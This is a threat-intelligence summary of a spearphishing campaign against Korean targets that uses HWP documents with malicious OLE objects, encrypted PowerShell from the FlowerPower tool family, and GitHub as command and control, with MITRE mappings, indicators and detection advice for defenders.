Keypoints
- Attackers deliver malicious OLE objects embedded within Hancom HWP documents to Korean targets.
- Initial lure is a forged interview request from a foreign news channel to induce user opening of the HWP file.
- Embedded OLE triggers execution of encrypted PowerShell commands tied to the FlowerPower attack tool series.
- Adversaries use GitHub as a code-hosting platform for command-and-control, leveraging it for versioning and remote commands.
- Observed payload filenames include flower01.ps1 and bobo.ps1; actor identifiers such as ‘flower9801’ were linked to past activity.
- The toolset is associated with aliases like BoBoStealer, FakeStriker, Jinho Spy, and GoldDragon in prior reports.
- Genians recommends visibility and early detection via Genian EDR to reduce impact and accelerate response.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – The campaign uses a malicious HWP document delivered as a targeted interview request to induce a user to open the file (‘disguised as an interview request from a foreign news channel’).
- [T1204.002] User Execution: Malicious File – The attack relies on a crafted OLE object embedded in an HWP to execute when the document is opened (‘malicious “Object Linking and Embedding” (OLE) in HWP Korean documents’).
- [T1059.001] PowerShell – Embedded OLE results in execution of encrypted PowerShell commands that run the FlowerPower tool components (‘Execution of encrypted PowerShell commands using the FlowerPower APT attack tool series’).
- [T1027] Obfuscated Files or Information – PowerShell payloads and commands are encrypted/obfuscated to hinder analysis and detection (‘Execution of encrypted PowerShell commands’).
- [T1102] Web Service – The adversary uses GitHub as a hosting and command/control mechanism to store and deliver code or commands (‘Setting up the code hosting platform GitHub for version control and collaboration as a command center for threat commands’).
Indicators of Compromise
- [File names] Payload/script examples observed – flower01.ps1, bobo.ps1.
- [Malware/tool names] Identified tool family aliases – FlowerPower (aka BoBoStealer, FakeStriker, Jinho Spy, GoldDragon).
- [Document type] Delivery vector – HWP documents with embedded malicious OLE objects used to trigger payloads.
- [Accounts/IDs] Actor identifier referenced in prior activity – ‘flower9801’.
- [Service/Domain] Command-and-control platform – github.com used to host code and act as a C2 repository.
The technical procedure begins with a targeted lure: attackers craft Hancom HWP documents embedding malicious OLE objects that execute when a user opens the file. The malicious OLE is used to persist or drop components and to invoke a command interpreter; in observed cases this leads to running encrypted PowerShell commands that fetch or launch additional payloads.
The payloads are PowerShell-based and employ encryption/obfuscation to hinder detection; filenames recovered from analysis include flower01.ps1 and bobo.ps1, and these are linked to the FlowerPower tool family (also reported under names like BoBoStealer/FakeStriker). After execution, the malware uses legitimate web services—specifically GitHub—to host code and issue commands, leveraging repository/versioning features as a covert command-and-control mechanism.
For defenders, focus on detecting HWP files with embedded OLE objects, monitoring PowerShell process creation with encoded/obfuscated command lines, and tracking unexpected outbound requests to code-hosting services (e.g., GitHub) for anomalous repository or raw content access. Endpoint telemetry and an EDR solution that flags OLE execution, encoded PowerShell, and unusual accesses to web-hosted repositories can enable early detection and containment.
Read more: https://www.genians.co.kr/blog/threat_intelligence/flowerpower